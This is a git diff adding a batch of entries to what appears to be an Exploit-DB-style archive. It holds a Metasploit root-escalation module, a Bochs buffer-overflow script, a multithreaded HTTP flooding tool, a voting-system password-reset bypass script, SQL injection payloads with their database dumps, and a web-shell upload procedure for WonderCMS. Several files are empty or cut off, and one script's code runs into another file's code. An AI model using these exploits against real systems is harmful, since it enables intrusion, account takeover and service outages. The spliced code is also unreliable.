diff --git a/exploits/hardware/webapps/43981.txt b/exploits/hardware/webapps/43981.txt
new file mode 100644
index 000000000..b221e6216
--- /dev/null
+++ b/exploits/hardware/webapps/43981.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Netis-WF2419 HTML Injection
+# Date: 20/01/2018
+# Exploit Author: Sajibe Kanti
+# Author Contact :https://twitter.com/@sajibekantibd
+# Vendor Homepage: http://www.netis-systems.com/
+# Version: Netis-WF2419 , V3.2.41381
+# Tested on: Windows 10
+
+# CEV : CVE-2018-6190
+
+
+ HTML Injection in Netis-WF2419
+
+
+
+Netis-WF2419 is prone to an HTML-injection vulnerability because it fails
+to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or script code could run in the context of the
+affected site, potentially allowing the attacker to steal cookie-based
+authentication credentials and control how the site is rendered to the
+user; other attacks are also possible.
+
+Netis-WF2419 is vulnerable;
+
+Proof of Concept:
+
+1. Go to your wireless router ip (ex. 192.168.0.1)
+
+2. Go to Wireless Settings - tab
+
+3. Now Click MAC Filtering -tab
+
+4.Write MAC Address and in -Description- write (
XSS-PWD
)
+
+5.Click Add
+
+6. Now You Can See HTML Injection
+
+
+
+#Solution:
+
+ Upgrade Firmware
\ No newline at end of file
diff --git a/exploits/linux/local/43971.rb b/exploits/linux/local/43971.rb
new file mode 100755
index 000000000..27881b641
--- /dev/null
+++ b/exploits/linux/local/43971.rb
@@ -0,0 +1,185 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apport / ABRT chroot Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on Linux systems by
+ invoking the default coredump handler inside a namespace ("container").
+
+ Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
+ vulnerable, due to a feature which allows forwarding reports to
+ a container's Apport by changing the root directory before loading
+ the crash report, causing 'usr/share/apport/apport' within the crashed
+ task's directory to be executed.
+
+ Similarly, Fedora is vulnerable when the kernel crash handler is
+ configured to change root directory before executing ABRT, causing
+ 'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be
+ executed.
+
+ In both instances, the crash handler does not drop privileges,
+ resulting in code execution as root.
+
+ This module has been tested successfully on Apport 2.14.1 on
+ Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Stéphane Graber', # Independent discovery, PoC and patch
+ 'Tavis Ormandy', # Independent discovery and C exploit
+ 'Ricardo F. Teixeira', # shell exploit
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'DisclosureDate' => 'Mar 31 2015',
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'References' =>
+ [
+ [ 'CVE', '2015-1318' ],
+ [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
+ # Exploits
+ [ 'EDB', '36782' ],
+ [ 'EDB', '36746' ],
+ [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],
+ # ABRT (Fedora)
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
+ # Apport (Ubuntu)
+ [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],
+ [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],
+ [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],
+ [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def check
+ kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first
+
+ if kernel_version < Gem::Version.new('3.12')
+ vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable"
+ return CheckCode::Safe
+ end
+
+ vprint_good "Linux kernel version #{kernel_version} is vulnerable"
+
+ kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern'
+
+ # Vulnerable core_pattern (abrt):
+ # kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+ # Patched systems no longer preface the command with /usr/sbin/chroot
+ # kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+ if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')
+ vprint_good 'System is configured to chroot ABRT for crash reporting'
+ return CheckCode::Vulnerable
+ end
+
+ # Vulnerable core_pattern (apport):
+ # kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P
+ if kernel_core_pattern.include? 'apport'
+ vprint_good 'System is configured to use Apport for crash reporting'
+
+ res = cmd_exec 'apport-cli --version'
+
+ if res.blank?
+ vprint_error 'Apport is NOT installed'
+ return CheckCode::Safe
+ end
+
+ apport_version = Gem::Version.new(res.split('-').first)
+
+ if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')
+ vprint_good "Apport version #{apport_version} is vulnerable"
+ return CheckCode::Vulnerable
+ end
+
+ vprint_error "Apport version #{apport_version} is NOT vulnerable"
+
+ return CheckCode::Safe
+ end
+
+ vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting'
+
+ CheckCode::Safe
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def exploit
+ if check != CheckCode::Vulnerable
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ # Upload Tavis Ormandy's newpid exploit:
+ # - https://www.exploit-db.com/exploits/36746/
+ # Cross-compiled with:
+ # - i486-linux-musl-cc -static newpid.c
+ path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
+ fd = ::File.open path, 'rb'
+ executable_data = fd.read fd.stat.size
+ fd.close
+
+ executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ executable_path = "#{base_dir}/#{executable_name}"
+ upload_and_chmodx executable_path, executable_data
+
+ # Upload payload executable
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{base_dir}/#{payload_name}"
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # newpid writes an 'exploit' directory
+ # which must be removed manually if exploitation fails
+ register_dir_for_cleanup "#{base_dir}/exploit"
+
+ # Change working directory to base_dir,
+ # allowing newpid to create the required hard links
+ cmd_exec "cd '#{base_dir}'"
+
+ print_status 'Launching exploit...'
+ output = cmd_exec executable_path
+ output.each_line { |line| vprint_status line.chomp }
+
+ # Check for root privileges
+ id = cmd_exec 'id'
+
+ unless id.include? 'root'
+ fail_with Failure::Unknown, 'Failed to gain root privileges'
+ end
+
+ print_good 'Upgraded session to root privileges'
+ vprint_line id
+
+ # Execute payload executable
+ vprint_status 'Executing payload...'
+ cmd_exec payload_path
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/43979.py b/exploits/linux/local/43979.py
new file mode 100755
index 000000000..1744d1198
--- /dev/null
+++ b/exploits/linux/local/43979.py
@@ -0,0 +1,116 @@
+# Exploit Author: Juan Sacco - http://exploitpack.com
+# Vulnerability found using Exploit Pack v10 - Fuzzer module
+#
+# An attacker could exploit this vulnerability to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Program description:
+# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that
+# runs on most popular platforms. It includes emulation of the Intel x86 CPU,
+# common I/O devices, and a custom BIOS.
+#
+# Homepage: http://bochs.sourceforge.net/
+# Version: 2.6-5
+# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb
+
+import os, subprocess
+from struct import pack
+
+# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'`
+#
+# Program received signal SIGSEGV, Segmentation fault.
+#
+# [----------------------------------registers-----------------------------------]
+# EAX: 0x1
+# EBX: 0x41414141 ('AAAA')
+# ECX: 0x8167fa0
+(<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov
+edx,DWORD PTR [esp+0x8])
+# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90
+(<_ZN13bx_real_sim_cD2Ev>: repz ret)
+# ESI: 0x41414141 ('AAAA')
+# EDI: 0x41414141 ('AAAA')
+# EBP: 0x41414141 ('AAAA')
+# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
+# EIP: 0x41424344 ('DCBA')
+# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT
+direction overflow)
+# [-------------------------------------code-------------------------------------]
+# Invalid $PC address: 0x41424344
+# [------------------------------------stack-------------------------------------]
+# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
+# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2
+# 0008| 0xbfffedc8 --> 0x0
+# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
+# 0016| 0xbfffedd0 --> 0x2
+# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0
+# 0024| 0xbfffedd8 --> 0x0
+# 0028| 0xbfffeddc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
+# [------------------------------------------------------------------------------]
+# Legend: code, data, rodata, value
+# Stopped reason: SIGSEGV
+# 0x41424344 in ?? ()
+
+# Padding goes here
+junk = 'A'*1200
+ropchain = pack('\'')
+ parser.add_argument('-p', help='Specify POST request. Usage: -p \'\'')
+ parser.add_argument('-d', help='Specify data payload for POST request', default=None)
+ parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
+ parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
+ args = parser.parse_args()
+
+ global url, payload, additionalHeaders
+ additionalHeaders = args.ah
+ payload = args.d
+
+ if args.g:
+ url = args.g
+ for i in range(args.t):
+ t = SendGETThread()
+ t.start()
+
+ if args.p:
+ url = args.p
+ for i in range(args.t):
+ t = SendPOSTThread()
+ t.start()
+
+ if len(sys.argv)==1:
+ parser.print_help()
+ exit()
+
+if __name__ == "__main__":
+ main(sys.argv[1:])
\ No newline at end of file
diff --git a/exploits/php/webapps/43963.txt b/exploits/php/webapps/43963.txt
new file mode 100644
index 000000000..f9296fc5d
--- /dev/null
+++ b/exploits/php/webapps/43963.txt
@@ -0,0 +1,37 @@
+Affected Code:
+
+public static function _uploadFile() { +
+- if ( ! wCMS::$loggedIn && ! isset($_FILES['uploadFile']) && ! isset($_REQUEST['token'])) return; + private static function uploadFileAction()
+- if (isset($_REQUEST['token']) && $_REQUEST['token'] == wCMS::_generateToken() && isset($_FILES['uploadFile'])) {
+
+
+Proof of Concept
+Steps to Reproduce:
+
+1. Login with a valid credentials
+2. Select Files option from the Settings menu of Content
+3. Upload a file with php extension containing the below code:
+
+
+
+4. Click on Upload
+5. Once the file is uploaded Click on the uploaded file and add ?cmd= to
+the URL followed by a system command such as whoami,time,date etc.
+Example:
+http://localhost:8081/wondercms/files/shell.php?cmd=dir
+
+Recommended Patch:
+
+Create a whitelist of allowed filetypes.
+
+The patch that addresses this bug is available here:
+
+https://github.com/robiso/WonderCMS-testRepo/commit/8bd6cf9f3bf6a1d0123eb8b646584a63ee323c8a?diff=split
+
+At line 742
\ No newline at end of file
diff --git a/exploits/php/webapps/43964.txt b/exploits/php/webapps/43964.txt
new file mode 100644
index 000000000..93c724727
--- /dev/null
+++ b/exploits/php/webapps/43964.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Wonder CMS 2.3.1 Host Header Injection
+# Date: 30-01-2018
+# Exploit Author: Samrat Das
+# Contact: http://twitter.com/Samrat_Das93
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 2.3.1
+# CVE : CVE-2017-14523
+# Category: Webapp CMS
+
+1. Description
+
+The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning
+
+
+
+2. Proof of Concept
+
+Intercept any web request of cms using a proxy tool.
+Change the http host header to:
+POST / HTTP/1.1
+Host: google.com
+
+You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/
+
+3. Solution:
+
+To Mitigate host header injections allows only a whitelist of allowed hostnames.
\ No newline at end of file
diff --git a/exploits/php/webapps/43965.txt b/exploits/php/webapps/43965.txt
new file mode 100644
index 000000000..772cf7371
--- /dev/null
+++ b/exploits/php/webapps/43965.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection
+# Dork: N/A
+# Date: 2018-02-03
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage:
+https://www.phpscriptsmall.com/product/matrimonial-website-script/
+# Version: 2.1.6
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept:
+
+
+ http://localhost/entrepreneur/view-profile.php?uid=[SQL]
\ No newline at end of file
diff --git a/exploits/php/webapps/43966.txt b/exploits/php/webapps/43966.txt
new file mode 100644
index 000000000..b273f992c
--- /dev/null
+++ b/exploits/php/webapps/43966.txt
@@ -0,0 +1,42 @@
+# #
+# Exploit Title: NixCMS 1.0 - 'category_id' SQL Ýnjection
+# Dork: N/A
+# Date: 03.02.2018
+# Vendor: https://www.nixdesign.de
+# Software Link: https://www.nixdesign.de/nix-cms/
+# Demo: http://www.jamaram.de/
+# Version: 1.0
+# Tested on: WiN10_X64
+# Exploit Author: Bora Bozdogan
+# Author WebSite : http://borabozdogan.net.tr
+# Author E-mail : borayazilim45@mit.tc
+# Author Skype : borayazilim45
+# #
+# POC:
+#
+# http://localhost/[PATH]/single.php?category_id=[SQL]
+#
+# Parameter: category_id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+#
+# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 15 columns
+# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF
+#
+# #
+
+available databases [3]:
+[*] information_schema
+[*] usr_web24_1
+[*] web24_4
\ No newline at end of file
diff --git a/exploits/php/webapps/43967.py b/exploits/php/webapps/43967.py
new file mode 100755
index 000000000..eef24938b
--- /dev/null
+++ b/exploits/php/webapps/43967.py
@@ -0,0 +1,70 @@
+# Exploit Title: Online Voting System - Authentication Bypass
+# Date: 02.02.2018
+# Vendor Homepage: http://themashabrand.com
+# Software Link: http://themashabrand.com/p/votin
+# Demo: http://localhost/Onlinevoting
+# Version: 1.0
+# Category: Webapps
+# Exploit Author: Giulio Comi
+# CVE : CVE-2018-6180
+
+
+#Description
+
+A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for accounts registered in the application.
+
+The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier and without requiring the current valid password for target account.
+
+# Proof of Concept:
+
+#!/usr/bin/env python
+import requests
+from time import sleep
+from lxml import html
+
+
+def own(auth_bypass_request):
+ """
+ Reset the password of a user just knowing his id
+ """
+ url_edit_password = "admin/profile.php"
+
+ payload = {
+ 'id': 1,
+ 'admin': 'admin', # overwrite the username of the victim
+ 'password': "ARBITRARY_PASSWORD", # overwrite the password of the victim
+ 'edit': ''
+ }
+
+ response = auth_bypass_request.post(target_site + url_edit_password, data=payload)
+
+ # Parse response to check if the request was successful
+ check_result = html.fromstring(response).xpath('//div[@class="alert alert-success"]//p//strong/text()')
+
+ return(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]()
+
+
+def login(login_request):
+ """
+ Enjoy the new password chosen for the victim
+ """
+ credentials = {'username': 'admin',
+ 'password': "ARBITRARY_PASSWORD",
+ 'usertype': 'admin',
+ 'login': ''
+ }
+
+ response = login_request.post(target_site, data=credentials)
+
+ print(response.text)
+
+
+if __name__ == "__main__":
+
+ target_site = "http://localhost/Onlinevoting/"
+ request = requests.Session()
+ if own(request):
+ sleep(4) # just a bit of delay
+ login(request)
+ else:
+ print('Maybe the given id is not registered in the application')
\ No newline at end of file
diff --git a/exploits/php/webapps/43974.txt b/exploits/php/webapps/43974.txt
new file mode 100644
index 000000000..e5692a424
--- /dev/null
+++ b/exploits/php/webapps/43974.txt
@@ -0,0 +1,61 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/43975.html b/exploits/php/webapps/43975.html
new file mode 100644
index 000000000..34512c2f7
--- /dev/null
+++ b/exploits/php/webapps/43975.html
@@ -0,0 +1,40 @@
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/43976.txt b/exploits/php/webapps/43976.txt
new file mode 100644
index 000000000..f7af1bf10
--- /dev/null
+++ b/exploits/php/webapps/43976.txt
@@ -0,0 +1,61 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/43977.php b/exploits/php/webapps/43977.php
new file mode 100644
index 000000000..52c09d7cb
--- /dev/null
+++ b/exploits/php/webapps/43977.php
@@ -0,0 +1,40 @@
+";
+foreach($l as $u){
+ echo "[-] ID\n\n\n\n:\n" .$u['id']."
";
+ echo "[-] Name\n\n:\n" .$u['name']."
";
+ echo "[-] Email\n:\n" .$u['email']."
";
+ echo "
";
+}echo "*-----------------------------*";}
+else{echo "[-] No user";}
+?>
\ No newline at end of file
diff --git a/exploits/php/webapps/43978.txt b/exploits/php/webapps/43978.txt
new file mode 100644
index 000000000..08c2ac660
--- /dev/null
+++ b/exploits/php/webapps/43978.txt
@@ -0,0 +1,91 @@
+# # # # #
+# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection
+# Dork: N/A
+# Date: 04.02.2018
+# Vendor Homepage: http://joomlaserviceprovider.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6609
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# Want To Donate ?
+# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
+# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
+#
+# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
+#
+# Parameter: ticketcode (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 29 columns
+# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG
+
+# 2)
+# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
+#
+# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
+#
+# 3)
+# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
+#
+# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
+#
+# 4)
+#
+#